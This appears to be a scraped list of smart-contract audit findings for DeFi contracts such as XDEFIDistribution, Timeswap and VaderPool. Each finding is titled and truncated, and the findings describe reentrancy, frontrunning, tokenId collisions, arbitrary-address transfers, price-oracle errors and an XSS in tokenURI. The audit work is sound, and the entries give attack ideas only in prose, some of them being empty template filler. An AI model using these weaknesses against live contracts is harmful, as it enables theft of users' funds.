DOS pay function

Handle egjlmn1 Vulnerability details in the pay function users repay their debt and in line 364: it decreases their debt. lets say a user wants to repay all his debt, he calls the pay function with his full debt. an attacker can see it and frontrun to repay a single token for his debt since it's...

_generateNewTokenId can create collisions

Handle sirhashalot Vulnerability details Impact The ERC721 standard requires that "for any ERC-721 Contract, the pair contract address, uint256 tokenId must be globally unique" quoted from . However, the generateNewTokenId function can produce tokenId values that are not globally unique. This wou...

Malicious early user/attacker can malfunction the contract and even freeze users' funds in edge cases

Handle WatchPug Vulnerability details pointsPerUnit += newXDEFI pointsMultiplier / totalUnitsCached; In the current implementation, pointsPerUnit can be changed in updateDistribution which can be called by anyone. A malicious early user can lock with only 1 wei of XDEFI and makes pointsPerUnit to...

Its possible to have different bonusMultiplier for same lock duration

Handle hubble Vulnerability details Impact The owner has previledge to change the bonusMultipler for a duration anytime, using the setLockPeriods function. So, its possible to have different bonusMultiplier for different users for same lock duration, which may not be desirable from the protocol...

merge() can cause lock to fail due to tokenId collision

Handle WatchPug Vulnerability details function generateNewTokenIduint256 points internal view returns uint256 tokenId // Points is capped at 128 bits max supply of XDEFI for 10 years locked, total supply of NFTs is capped at 128 bits. return points PoC 1. Alice lock 1 XDEFI for 7 days 3 times got...

NFT is not burned during unlock

Handle sirhashalot Vulnerability details Impact When the lock function is called, an ERC721 token is minted. The unlock function should perform the opposite operation as lock and burn the corresponding NFT. The unlock function modifies the positionOf mapping, but does NOT call the burn function t...

setLockPeriods accepts multipliers less than 100 (1x mult)

Handle StErMi Vulnerability details Impact In the setLockPeriods you are not making any checks on the multipliers value for a given index. It means that the multiplier could be less than 100 1x. Proof of Concept Tools Used Manual Recommended Mitigation Steps If you don't want to enable multiplier...

lockWithPermit() function allows for replay attacks and signature malleability

Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the lockWithPermit function calls permit on the XDEFI token. The problem with simply using permit alone for this is the message that is signed by the owner using the ECDSA algorithm. The message only contains the receiver...

No guard against zero address can possibly break functions with onlyOwner modifier

Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the proposeOwnership function should check that the newOwner arg is not a zero address because one error can break every function in the contract that uses the onlyOwner modifier because if the owner is set to the zero address...

MATIC/AVAX and AVAX/MATIC pools

Handle 0x0x0x Vulnerability details The MATIC/AVAX and AVAX/MATIC pools are close to being undercollateralized. Don't fall for the high APR Psyops, always check the collateralization before lending into a pool, otherwise borrowers will default and you will loose your asset --- The text was update...

Reentrancy allows attacker to lock the funds deposited in the contract

Handle tqts Vulnerability details Impact It is possible for attackers to exploit a reentrancy issue in lockuint256,uint256,address that would allow them to lock all funds deposited prior to the attack. Proof of Concept The problem lies in the lockuint256,uint256,address function, that transfers t...

XSS in uri token

Handle 0x1f8b Vulnerability details Impact It could be produced an XSS. Proof of Concept The method tokenURI could be used with an arbitrary IPair, if this pair is composed with a specific symbol, it could be produced an uri with XSS inside the SVG file, it will produce an stored XSS. Reference:...

no check that proposed owner is not the contract itself

Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol the proposeOwnership function sets a pending owner but does not check to make sure that the newOwner is not the contract itself. This check is important to not risk setting the owner to an address that cannot be changed...

Iterating over large count numbers can cause out of gas errors

Handle jayjonah8 Vulnerability details Impact In XDEFIDistributionHelper.sol the getAllTokensForAccount function iterates over the count and performs actions on each iteration. Iterating over large arrays can cause out of gas failures and so the count number should be checked or limited to a max...

Missing noreentrant modifier on merge() and updateDistribution(), can reenter from the _lock()

Handle Fitraldys Vulnerability details Impact A user can call lock that will call lock, that eventually will call safeMint, the safeMint function will make an external call to the destination address through checkOnERC721Received, and since the merge and updateDistribution didnt have noreentrant...

23

Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps --- The...

vulnerability

Handle 0v3rf10w Vulnerability details In technical terms, Timeswap is an automated protocol based on the use of liquidity pools and implemented on the Ethereum blockchain. Users create liquidity pools with the participation of smart contracts. One pool is one marketplace providing exchange in a...

Anyone can steal XDEFI from the XDEFIDistribution contract and make the contract insolvent

Handle onewayfunction Vulnerability details Impact Anyone can steal XDEFI from the XDEFIDistribution contract, thereby making the contract insolvent. In the process, they also make the updateDistribution function uncallable -- and thus make the value of pointsPerUnit unchangeable. This comes with...

More than one historical lock-position may be represented by a single tokenId

Handle onewayfunction Vulnerability details Impact More than one historical lock-position may be represented by a single tokenId, violating the "uniqueness" property claimed by the xdefi-distribution repo's README.md. Proof of Concept The README.md says: The NFT's score is embedded in the tokenId...

totalDepositedXDEFI variable can be made incorrect by an attacker sending tokens

Handle jayjonah8 Vulnerability details Impact In XDEFIDistribution.sol, calling the lock function eventually calls lock where the totalDepositedXDEFI amount is updated based on the amount argument passed in by the caller since that amount is transferred from the sender into the contract. But the...

Missing burn function in _unlock function

Handle Tomio Vulnerability details Impact In the XDEFIDistribution.sol, a user can lock xdefi token and get an erc721/nft token through safeMint function, however when the user call unlock function this contract will delete the position of this user, but didnt call the burn function in ERC721...

users might pay enormous amouts of gas

Handle danb Vulnerability details when a user mints new liquidity, it the pair doesn't already exist, it deploys it. deploying a new contract on ethereum is super expensive, especially when it's such a large contract like TimeswapPair, it can cost thousands of dollars. Impact user who try to mint...

merge is loss of all assets

Handle danb Vulnerability details merge function mints nft, but doesn't add it to positionOf, which makes it worthless, in addition it burns all the nfts of the user which means they lost all assets. --- The text was updated successfully, but these errors were encountered: All reactions...

DOS - preventing users from locking assets

Handle egjlmn1 Vulnerability details An attacker can prevent any user from locking assets due to the unsafe id generation for the nfts. The id is generated by using only the amount deposited, the duration to lock and the totalSiupply of nfts. The first two are easy for the attacker to copy, so al...

Dashboard is not working , lend positiona are still loading, the same is for Lend button, Lend Amount to lend is not refresjing

Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps --- The...

Non unique token ID might lead to collusion when merging

Handle kenzo Vulnerability details Token IDs are defined as concatenation of points, total supply + 1. The total supply can decrease when merging. This means that the contract might try to mint a token with an ID which already exists. Impact Under specific circumstances, users won't be able to lo...

Important state updates are made after the callback in the mint() function

Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the mint function has a callback in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function reentrancy. Since...

100

Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps --- The...

The reentrancy vulnerability in _safeMint can allow an attacker to steal all rewards

Handle cccz Vulnerability details Impact There is a reentrancy vulnerability in the safeMint function function safeMint address to, uint256 tokenId, bytes memory data internal virtual mintto, tokenId; require checkOnERC721Receivedaddress0, to, tokenId, data, "ERC721: transfer to non ERC721Receive...

pay() function has callback to msg.sender before important state updates

Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the pay function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function...

Incorrect fund distribution - updateDistribution not called in lock/unlock

Handle csanuragjain Vulnerability details Impact User will get lesser withdraw amount than they are entitle to. This happens since updateDistribution is not called in locking and unlocking function. Due to this pointsPerUnit does not get updated and hence incorrect withdraw amount gets calculated...

no reentrancy guard on mint() function that has a callback

Handle jayjonah8 Vulnerability details Impact In CollateralizedDebt.sol, the mint function calls safeMint which has a callback to the "to" address argument. Functions with callbacks should have reentrancy guards in place for protection against possible malicious actors both from inside and outsid...

In the lend() function state updates are made after the callback

Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the lend function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross function...

_safeMint Will Fail Due To An Edge Case In Calculating tokenId Using The _generateNewTokenId Function

Handle leastwood Vulnerability details Impact NFTs are used to represent unique positions referenced by the generated tokenId. The tokenId value contains the position's score in the upper 128 bits and the index wrt. the token supply in the lower 128 bits. When positions are unlocked after expirin...

_lock Performs An Improper Check When Enforcing The MAX_TOTAL_XDEFI_SUPPLY Constraint

Handle leastwood Vulnerability details Impact The lock function intends to lock users' XDEFI tokens for a predetermined duration. The contract contains a MAXTOTALXDEFISUPPLY constraint which aims to prevent total deposits from exceeding this amount. However, lock does not check this correctly and...

Reentrancy at lock can lead to wrong accounting

Handle kenzo Vulnerability details The lock function calls safeMint in the midst of it. This can lead to reentry to updateDistribution, thereby ruining contract invariants. Impact At worst case, loss of user funds: distributableXDEFI will be set to be bigger than it really is, and so when a...

borrow() function has state updates after a callback to msg.sender

Handle jayjonah8 Vulnerability details Impact In TimeswapPair.sol, the borrow function has a callback to the msg.sender in the middle of the function while there are still updates to state that take place after the callback. The lock modifier guards against reentrancy but not against cross functi...

Price Calculation Favours Higher Priced Token Pairs

Handle leastwood Vulnerability details Impact calculateVaderPrice and calculateUSDVPrice are used indirectly by USDV.sol to calculate the mint and burn amounts for the respective actions. totalUSD and totalVader/totalUSDV are calculated by iterating through each token pair, where the ratio betwee...

Covering impermanent loss allows profiting from asymmetric liquidity provision at the expense of reserves

Handle hyh Vulnerability details Impact Pool funds will be siphoned out over time as swaps and asymmetric LP provision are generally balancing each other economically. While with introduction of IL reimbursement a malicious user can make an asymmetric LP, then profit immediately from out of balan...

USDV.sol Mint and Burn Amounts Are Incorrect

Handle leastwood Vulnerability details Impact The USDV.mint function queries the price of Vader from the LiquidityBasedTwap contract. The calculation to determine uAmount in mint is actually performed incorrectly. uAmount = vPrice vAmount / 1e18; will return the USD amount for the provided Vader ...

mintSynth() can transfer funds from an arbitrary address

Handle Critical Vulnerability details Impact Attackers can steal funds from users' balances for those who approved the VaderPoolV2 contract. Proof of Concept nativeAsset.safeTransferFromfrom, addressthis, nativeDeposit; VaderPoolV2.mintSynth allows anyone to transfer funds from an arbitrary addre...

Using single total native reserve variable for synth and non-synth reserves of VaderPoolV2 can lead to losses for synth holders

Handle hyh Vulnerability details Impact Users that mint synths do provide native assets, increasing native reserve pool, but do not get any liquidity shares issued. In the same time, an exit of non-synth liquidity provider yields releasing a proportion of all current reserves to him. Whenever an...

Slippage control

Handle pauliax Vulnerability details Impact functions mint and burn of USDV should allow the user to specify min amounts to receive. This would help the user to avoid a huge slippage. Another reason is that price is fetched from lbt but this address can be changed anytime function setLBTwap, so i...

Adding pair of the same foreignAsset would replace oracle of earlier entry

Handle gzeon Vulnerability details Impact Oracles are mapped to the foreignAsset but not to the specific pair. Pairs with the same foreignAsset e.g. UniswapV2 and Sushi will be forced to use the same oracle. Generally this should be the expected behavior but there are also possibility that while...

VaderPoolV2 minting synths & fungibles can be frontrun

Handle cmichel Vulnerability details The VaderPoolV2 mintFungible and mintSynth functions perform an unsafe nativeAsset.safeTransferFromfrom, addressthis, nativeDeposit with a parameter-specified from address. Note that these functions are not called by the Router, they are directly called on the...

Vader TWAP averages wrong

Handle cmichel Vulnerability details The vader price in LiquidityBasedTWAP.getVaderPrice is computed using the pastLiquidityWeights and pastTotalLiquidityWeight return values of the syncVaderPrice. The syncVaderPrice function does not initialize all weights and the total liquidity weight does not...

USDV TWAP averages wrong

Handle cmichel Vulnerability details The vader price in LiquidityBasedTWAP.getUSDVPrice is computed using the pastLiquidityWeights and pastTotalLiquidityWeight return values of the syncUSDVPrice. The syncUSDVPrice function does not initialize all weights and the total liquidity weight does not...

totalLiquidityWeight Is Updated When Adding New Token Pairs Which Skews Price Data For getVaderPrice and getUSDVPrice

Handle leastwood Vulnerability details Impact The addVaderPair function is called by the onlyOwner role. The relevant data in the twapData mapping is set by querying the respective liquidity pool and Chainlink oracle. totalLiquidityWeight for the VADER path is also incremented by the...

vader price is wrong

Handle danb Vulnerability details for tokens that are not updating in syncVaderPrice because their updatePeriod is greated than timeElapsed, their liquidty weight will be zero, it will make the vader price wrong when calling getVaderPrice and it can be exploited. Recommended Mitigation Steps move...

Anyone Can Frontrun VaderPoolV2.mintSynth() To Steal Synthetic Assets

Handle leastwood Vulnerability details Impact The mintSynth function is callable by any user and creates a synthetic asset against foreignAsset if it does not already exist. The protocol expects a user to first approve the contract as a spender before calling mintSynth. However, any arbitrary use...